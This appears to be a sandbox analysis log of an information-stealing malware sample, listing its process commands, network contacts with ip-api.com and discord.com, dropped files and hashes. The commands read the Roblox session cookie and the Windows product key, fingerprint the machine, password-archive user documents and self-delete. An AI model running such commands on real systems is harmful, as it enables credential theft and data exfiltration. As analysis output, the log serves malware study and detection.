powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\kVSsm.zip" *"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\_MEI18442\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI18442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\kVSsm.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-zs78d.in | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI18442\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/1228-25-0x00007FFA943C0000-0x00007FFA949B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18442\base_library.zip
| MD5 | 4b011f052728ae5007f9ec4e97a4f625 |
| SHA1 | 9d940561f08104618ec9e901a9cd0cd13e8b355d |
| SHA256 | c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6 |
| SHA512 | be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_ctypes.pyd
| MD5 | 343e1a85da03e0f80137719d48babc0f |
| SHA1 | 0702ba134b21881737585f40a5ddc9be788bab52 |
| SHA256 | 7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664 |
| SHA512 | 1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/1228-48-0x00007FFA9E280000-0x00007FFA9E28F000-memory.dmp
memory/1228-47-0x00007FFA957A0000-0x00007FFA957C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_ssl.pyd
| MD5 | e5f6bff7a8c2cd5cb89f40376dad6797 |
| SHA1 | b854fd43b46a4e3390d5f9610004010e273d7f5f |
| SHA256 | 0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5 |
| SHA512 | 5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_sqlite3.pyd
| MD5 | a9d2c3cf00431d2b8c8432e8fb1feefd |
| SHA1 | 1c3e2fe22e10e1e9c320c1e6f567850fd22c710c |
| SHA256 | aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3 |
| SHA512 | 1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_socket.pyd
| MD5 | 2957b2d82521ed0198851d12ed567746 |
| SHA1 | ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2 |
| SHA256 | 1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2 |
| SHA512 | b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_queue.pyd
| MD5 | 0e5997263833ce8ce8a6a0ec35982a37 |
| SHA1 | 96372353f71aaa56b32030bb5f5dd5c29b854d50 |
| SHA256 | 0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e |
| SHA512 | a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_lzma.pyd
| MD5 | 932147ac29c593eb9e5244b67cf389bb |
| SHA1 | 3584ff40ab9aac1e557a6a6009d10f6835052cde |
| SHA256 | bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3 |
| SHA512 | 6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_hashlib.pyd
| MD5 | d71df4f6e94bea5e57c267395ad2a172 |
| SHA1 | 5c82bca6f2ce00c80e6fe885a651b404052ac7d0 |
| SHA256 | 8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2 |
| SHA512 | e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_decimal.pyd
| MD5 | 8b623d42698bf8a7602243b4be1f775d |
| SHA1 | f9116f4786b5687a03c75d960150726843e1bc25 |
| SHA256 | 7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c |
| SHA512 | aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_bz2.pyd
| MD5 | 3bd0dd2ed98fca486ec23c42a12978a8 |
| SHA1 | 63df559f4f1a96eb84028dc06eaeb0ef43551acd |
| SHA256 | 6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07 |
| SHA512 | 9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\unicodedata.pyd
| MD5 | bc28491251d94984c8555ed959544c11 |
| SHA1 | 964336b8c045bf8bb1f4d12de122cfc764df6a46 |
| SHA256 | f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4 |
| SHA512 | 042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\sqlite3.dll
| MD5 | 74b347668b4853771feb47c24e7ec99b |
| SHA1 | 21bd9ca6032f0739914429c1db3777808e4806b0 |
| SHA256 | 5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e |
| SHA512 | 463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\select.pyd
| MD5 | e021cf8d94cc009ff79981f3472765e7 |
| SHA1 | c43d040b0e84668f3ae86acc5bd0df61be2b5374 |
| SHA256 | ab40bf48a6db6a00387aece49a03937197bc66b4450559feec72b6f74fc4d01e |
| SHA512 | c5ca57f8e4c0983d9641412e41d18abd16fe5868d016a5c6e780543860a9d3b37cc29065799951cb13dc49637c45e02efb6b6ffeaf006e78d6ce2134eb902c67 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI18442\blank.aes
| MD5 | 5ad8375a488a2c42c6faa615c07c6fd7 |
| SHA1 | e88370f594250c6c71ae0048d6dee19c275b5698 |
| SHA256 | e7f6307c77fa49b3d455c33816cf5cc0c387e65b1398f682120b5ca867faa10a |
| SHA512 | 075f600c03b3aff12e1d2e719f6bf0ae3e1667b743fedfb509cae9c847d41a6fc9f8a37d6f3d4ffd2fdb0e40bf824698e45b84e19887b3257f0e59ce1d755cd7 |
memory/1228-54-0x00007FFA94D50000-0x00007FFA94D7D000-memory.dmp
memory/1228-56-0x00007FFA94D30000-0x00007FFA94D49000-memory.dmp
memory/1228-58-0x00007FFA942D0000-0x00007FFA942F3000-memory.dmp
memory/1228-60-0x00007FFA858C0000-0x00007FFA85A3E000-memory.dmp
memory/1228-64-0x00007FFA95010000-0x00007FFA9501D000-memory.dmp
memory/1228-63-0x00007FFA9B530000-0x00007FFA9B549000-memory.dmp
memory/1228-66-0x00007FFA94E50000-0x00007FFA94E83000-memory.dmp
memory/1228-70-0x00007FFA943C0000-0x00007FFA949B2000-memory.dmp
memory/1228-71-0x00007FFA94D80000-0x00007FFA94E4D000-memory.dmp
memory/1228-72-0x000001B6D82B0000-0x000001B6D87D9000-memory.dmp
memory/1228-73-0x00007FFA85390000-0x00007FFA858B9000-memory.dmp
memory/1228-78-0x00007FFA94D20000-0x00007FFA94D2D000-memory.dmp
memory/1228-80-0x00007FFA86000000-0x00007FFA8611C000-memory.dmp
memory/1228-77-0x00007FFA926A0000-0x00007FFA926B4000-memory.dmp
memory/1228-76-0x00007FFA957A0000-0x00007FFA957C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_330livtt.e5f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2676-84-0x000002485CAC0000-0x000002485CAE2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
\??\c:\Users\Admin\AppData\Local\Temp\t4nzx3ds\t4nzx3ds.cmdline
| MD5 | 5fe4ac1f1311f679ccbc31b23375b33d |
| SHA1 | f1c883598aca453872cd283de58169fba30c70e8 |
| SHA256 | c89cacc4a8da78b275b7c944b888c425b2ecc5895fd9c3e5fdcd6c48ceabefd3 |
| SHA512 | afb6c169c376e8a8819c5a1d5ad374b1910df262f2a16ced62514e59aae27aae30b96465dd22877f4daa460dd19d3cd9a1a29e0e186eb09b535b56c764779ce9 |
\??\c:\Users\Admin\AppData\Local\Temp\t4nzx3ds\t4nzx3ds.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\t4nzx3ds\CSC5D9F9763EB18433FB67E9579B288AB26.TMP
| MD5 | af8f26e396e7f1d95ec7a88a383aaedc |
| SHA1 | 9a6866a10e4e7e7132c4dfad25db1ade129bf430 |
| SHA256 | 602139baa9985c93e512b903e761e483481f07366e9243e0a0cf539641b26049 |
| SHA512 | 0ae644a1c82ff2a8a2a9142c11750d5d303648a506eb73e5d877c5386aa347e1d0701244d3bb3d357fa06a0208f71f2a389c327768ddfde054d19d7b4bb7239f |
C:\Users\Admin\AppData\Local\Temp\RES87BE.tmp
| MD5 | 48a45b05f591e179465005cef9322261 |
| SHA1 | f908962513bc473a845def712068077e9ee80760 |
| SHA256 | 03b127c112b5af8b92372bf74ec5f4056e22938f49ac571fe5a05e0beca45e90 |
| SHA512 | b1a48c3ecd1230553b28da56852d2d70558b25a242be5cb5cc6a09763243fb6c7517c7e0afe0e38814e7109513d68e63896a60995341217731d177814195567b |
C:\Users\Admin\AppData\Local\Temp\t4nzx3ds\t4nzx3ds.dll
| MD5 | b82a3e00b71b1ce70b95dc9077f01611 |
| SHA1 | 99bea76ac368c61c2de4c393ece2d4eb2179814f |
| SHA256 | 70be262524431e11eef411fc5efd4bffe52c590aac90c924bb32e714c7bcb70c |
| SHA512 | bd73b8a5d4e29c1e39c7c518d1b820ec42a7793ac77aa3e37cdd2f9fa179353adb3d0efd9e6aa64cd3743702d385557d8c17701b9ec5da1698f3a0fc1ad709c9 |
memory/3632-222-0x000002027BDD0000-0x000002027BDD8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3b444d3f0ddea49d84cc7b3972abe0e6 |
| SHA1 | 0a896b3808e68d5d72c2655621f43b0b2c65ae02 |
| SHA256 | ab075b491d20c6f66c7bd40b57538c1cfdaab5aac4715bfe3bbc7f4745860a74 |
| SHA512 | eb0ab5d68472ec42de4c9b6d84306d7bca3874be1d0ac572030a070f21a698432418068e1a6006ff88480be8c8f54c769dee74b2def403f734109dba7261f36b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 61433ae3d90930509cfd0bc277bc7764 |
| SHA1 | 9d1fa5f9885b07f4bab3d1a21ccb21c0054ed0f0 |
| SHA256 | 50ee95bb5c18b8d6df0418514c379736b10f42f0a4814fed9036891325fcdc0a |
| SHA512 | 5e3a2b31d6bddf04a3cfdf1a0c24077299ec50ed30b66438c775430d80843cb5d13290c6352abb8fd78bbb6748ef0377ebbdaf7d9352cebbbc8da0e3fd6566c4 |
memory/756-280-0x00000197F11D0000-0x00000197F13EC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
memory/1756-293-0x0000020A6CBC0000-0x0000020A6CDDC000-memory.dmp
memory/1228-295-0x00007FFA942D0000-0x00007FFA942F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\BackupComplete.ppt
| MD5 | 88395daa36d42337b4d580db85259498 |
| SHA1 | 1b8abe31577c2ed9d8835f91c77aef893b8bb0e1 |
| SHA256 | 4a9822bb3a1409ab780fb73785ca9e83c0560ba2ba7f8f062128496e62ee2e03 |
| SHA512 | 3a293fead068d18ed2f1be30577a64b661e4faa77f6a516dc3d633026a59fe34665eb3a6aff282ea96ca18914da605f03c84e668e2a17b41a8e6229082c58800 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\BackupConfirm.tmp
| MD5 | 249354f23efe3e8ff286e171a4091a0d |
| SHA1 | e7077201ef414d5d746dd6b14a85141b998e922b |
| SHA256 | 7d35300d6b25255187b6ee92a7b63b7df91c3b7a05c945bb60857b99582687f2 |
| SHA512 | 3a26b95afca04bc2991e6bb69f85745a00acd204c4ea6c61fa7997104bc191aa8a9cbdd33e384040dd159beefb634c942f05ee194a8fb482efa45e14f63982ca |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ConvertFromWait.csv
| MD5 | d7c67027ec419bf1d2ac6bd19d5b5822 |
| SHA1 | ce601584426e809747a425cf19f6d49bc3dae5e6 |
| SHA256 | baf2c7342654a3aeba77f2980e8b63fdab1a30f8911f6bc98410def180b821aa |
| SHA512 | 796cf67f95fa739be4f3bde2e8bbbe490a575ba52a45470869488246394dd2f7e0602d17e4a70129aaa169b511ba5254a542e1aae61b6caf5586e7b2855b8370 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\CopyFind.csv
| MD5 | 93fb6b0d211522e78e7726227c69375e |
| SHA1 | 3e220773ede76a54cbbb3df4e03e28da76886e39 |
| SHA256 | 7ab2125ac13f6549acab56a7f2a84c76eb8437892aa4b4ffb9dc2d5a61f13bba |
| SHA512 | f5a5a7c6496b1a78684345a5d903cc7cc772492b4e013784c1794dc80920d814433ee73c71aac7928f407539eb4a30db1815b79d502b8ee8bd62f48568599963 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\LimitAdd.jpg
| MD5 | 3adf8226d32581d3f1f8312563c5599b |
| SHA1 | 126dea508fb63a8f6a89e86510a63e55aa822108 |
| SHA256 | 4cd7e2a2b1362e3c9059e0d28f1ceac103cd7fd0e105876c97b434146224c928 |
| SHA512 | 560bb57f473d1e992126323b7afe1f47ee714f64005464a95c87f4e4ba50b04b8d6d3289a235738b3f9304af375565a296497fa8b0ab82274984d37af78a5c98 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\PopSubmit.mp4
| MD5 | c8069f1cac33be9ba69ffb0d0b928fb4 |
| SHA1 | 95922c0aaeef1bd4cf288c9e9cced1958d69d676 |
| SHA256 | 631667ced4d5b426ace21a6d18662d3c99b9d494c28b296fb8dafb3fc1db5a26 |
| SHA512 | ac4ae5448c8c766965b58ba2be858c679f12a437b06c8a8ceb85cc9f7e67fc3e4a9f051438a4c298c6f513cde3598e93fe45c41e77e74568090db748d6e2220d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CompareShow.txt
| MD5 | 87c0fe1721696056f21297e7ef611dfe |
| SHA1 | 7dec8deebf1a8eb1240ecd0c3a993013c04ea212 |
| SHA256 | 03ff15d017899b359400879a5e0c68f65fb887e9d264a04f143020d294091463 |
| SHA512 | 283e4c3c93fcbce32cc02a1e3f549a6d66c320715c4335c3690ce29b61d928fdf4707b5fcc50d9ef31aa4d9bebe3c46534087ce9483f1fbf6fe62863dbc11482 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ConvertFromFind.pdf
| MD5 | 755cb7bb2f6ae750b37b10e5b6fea098 |
| SHA1 | a9d69b6cdd0cb7efbb76889fe154f9a3482453bd |
| SHA256 | 6d51ea47005a030d7d9cc3a8704a56f8d55ae341126f27fefeeea71a0036d3ef |
| SHA512 | 2e4042501f161f96c86caf1e0d447dbedb071dbf0f78ffa0b139a5aa183f6107008b6941cf6dd66466fcd22071e00906d51b3d0ebdeb06f1e3009c35eec965f0 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\DisconnectTrace.docx
| MD5 | 9a5455d8592d717839130f21aedbbdc2 |
| SHA1 | 2f101be6ad48bf049f4cb8c602b45a71d5035340 |
| SHA256 | f4063fdc776a4c514d56e0ac253efa880683f6373df5006652fe856e1bcd178a |
| SHA512 | 268387985a4f903ca706ebc7f68dd3be3cf600d92fe51e668c693b8c39cedceeb94b3ff19352ec3d45f6b68f6890c8b8b9da856cec493034cd5505dcf4bf876c |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
memory/1228-326-0x00007FFA86000000-0x00007FFA8611C000-memory.dmp
memory/1228-323-0x00007FFA85390000-0x00007FFA858B9000-memory.dmp
memory/1228-327-0x00007FFA858C0000-0x00007FFA85A3E000-memory.dmp
memory/1228-322-0x00007FFA94D80000-0x00007FFA94E4D000-memory.dmp
memory/1228-312-0x00007FFA943C0000-0x00007FFA949B2000-memory.dmp
memory/1228-321-0x00007FFA94E50000-0x00007FFA94E83000-memory.dmp
memory/1228-319-0x00007FFA9B530000-0x00007FFA9B549000-memory.dmp
memory/1228-313-0x00007FFA957A0000-0x00007FFA957C4000-memory.dmp
memory/1228-348-0x00007FFA943C0000-0x00007FFA949B2000-memory.dmp
memory/1228-360-0x00007FFA926A0000-0x00007FFA926B4000-memory.dmp
memory/1228-373-0x00007FFA94D80000-0x00007FFA94E4D000-memory.dmp
memory/1228-372-0x00007FFA94E50000-0x00007FFA94E83000-memory.dmp
